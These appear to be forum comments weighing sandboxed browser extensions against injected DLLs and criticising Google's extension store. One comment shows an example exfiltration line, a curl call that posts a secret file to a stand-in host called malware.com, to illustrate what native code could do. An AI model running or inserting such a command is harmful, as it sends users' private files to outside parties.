The difference here is are you downloading a random dll from a well known source or from http://free-vpn-fast-internet.dwnloadfree.ru/free-chrome-vpn...? My mom isn't going to know the difference and will click the big green DOWNLOAD NOW button blindly.
Injecting a DLL in the browser implies code running with the browser's permissions, which means the DLL will be able to access everything on your system. For example `system("curl https://malware.com -F@/etc/secret-file")` will be possible. Another example is that it could also see all your saved passwords.
A javascript extension cannot do that. It is sandboxed and is bound to a permission system limiting what it can do on top of that.
Signing a DLL only proves that the author is who he says he is. Not that his intentions are good. Same for browser extensions.
So it's best to limit what the extension can do to begin with.
- People are afraid of plugins "in the wild". People need some kind of centralized, managed "extension store"
- People complains about store policy like Manifest V3
I don't think a single mechanism can please both crowds.
And what's worse? Google doesn't actually care about the security of the the "store". Scam extensions are everywhere. The "audit process" are minimal, customer/developer service are essentially none, and Google only enforce rules that affect their ads business.
The difference here is are you downloading a random dll from a well known source or from http://free-vpn-fast-internet.dwnloadfree.ru/free-chrome-vpn...? My mom isn't going to know the difference and will click the big green DOWNLOAD NOW button blindly.